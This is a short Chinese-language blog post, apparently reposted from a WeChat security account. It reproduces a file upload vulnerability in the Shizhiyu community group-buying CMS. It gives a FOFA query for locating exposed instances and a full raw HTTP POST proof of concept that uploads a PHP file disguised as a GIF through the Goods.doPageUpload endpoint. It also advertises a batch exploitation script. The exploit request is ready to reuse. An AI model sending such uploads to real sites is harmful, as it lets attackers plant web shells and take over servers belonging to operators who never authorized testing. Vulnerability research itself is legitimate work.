漏洞复现-狮子鱼社区团购系统CMS

  • A+
所属分类:安全文章

免责声明:

由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。切勿用于未授权测试!本文主要来自日常学习记录


   FOFA语句:
"/seller.php?s=/Public/login"


利用poc:

POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1Host: xxx.xxx.xxx.xxxContent-Length: 214Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: nullContent-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSsUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
------WebKitFormBoundary8UaANmWAgM4BqBSsContent-Disposition: form-data; name="upfile"; filename="Test.php"Content-Type: image/gif
<?php echo('Test');?>------WebKitFormBoundary8UaANmWAgM4BqBSs--

漏洞复现-狮子鱼社区团购系统CMS


脚本批量:

漏洞复现-狮子鱼社区团购系统CMS

漏洞复现-狮子鱼社区团购系统CMS

获取脚本回复:狮子鱼文件上传

本文始发于微信公众号(Fight Tigers Team):漏洞复现-狮子鱼社区团购系统CMS

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: